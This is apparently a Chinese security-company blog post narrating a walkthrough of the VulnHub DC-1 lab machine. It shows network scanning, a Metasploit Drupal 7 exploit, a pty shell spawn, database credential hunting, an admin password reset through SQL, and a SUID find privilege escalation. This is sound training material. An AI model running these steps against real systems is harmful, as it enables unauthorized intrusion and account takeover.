点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
DC-1打靶记录
环境下载
https://www.vulnhub.com/entry/dc-1,292/
ip配置
NAT模式 跟kali在一个网段
一.信息收集
1.扫描同一网段的主机:
arp-scan -l
定位ip地址 192.168.117.140
或者使用:
namp 192.168.117.0/24 -sn
2.进行端口扫描
namp -sS -A -T4 192.168.117.140 -p 0-65535
发现了许多可利用的信息
1. 22端口 后期可以使用hydra进行ssh爆破来获取shell
2. web服务泄露的文件robots.txt反爬虫文件 从中获取版本信息或者敏感信息
3. Drupal 7 cms和版本号
3.web指纹识别
如果在我们不知到如何去突破的时候 可以用:
whatweb -v 192.168.117.140
查看web框架和指纹
扫出cms版本和php版本
这里推荐一个小插件 可以快速的识别网站的框架
二:漏洞利用
有cms框架的话使用msf
来查看漏洞
1.进去msf
msfconsole
2.按照版本查询漏洞search Drupal 7.x
3.发现可利用
‘use 0’ 进入options
查看信息
set RHOSTS=192.168.117.140
设置目标端口run
发现获取到session的连接
查看基本信息
sysinfo
直接建立shell连接shell
这里可以使用python的pty模块来反弹shell
python -c "import pty;pty.spawn('/bin/sh')";
flag1
直接 ls
拿到flag
手动翻译:
每个好的CMS都需要一个配置文件——你也是。
flag2
直接找配置文件:
一个一个找太慢了吧!find . -name "set*"
find . -name "*.conf"
找到了!!!!!!
好家伙 有flag 还有数据库密码
这不登进去看???
进去就一顿找user表 admin!!!
好家伙 加密了 翻翻看 加密脚本吧 给他改了!!!
find . -name "*.sh"
这不有了
重新加个密
改密码:
update users set pass="" where name='admin'
flag3
登录
先看看有哪些用户
cat /etc/passwd
flag4
cd /home/flag4
没权????
三.提权
尝试suid 提权
找到有s权限的文件find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type=f 2>/dev/null
find可用!!
find /var/www/misc -exec “/bin/sh” ;
find 提权得到后面两个flag
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
企业简介
赛克艾威 - 专注政企安全服务
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:sechub安全
哔哩号:SecHub官方账号
原文始发于微信公众号(sechub安全):红队打靶 | vulnhub系列:DC-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论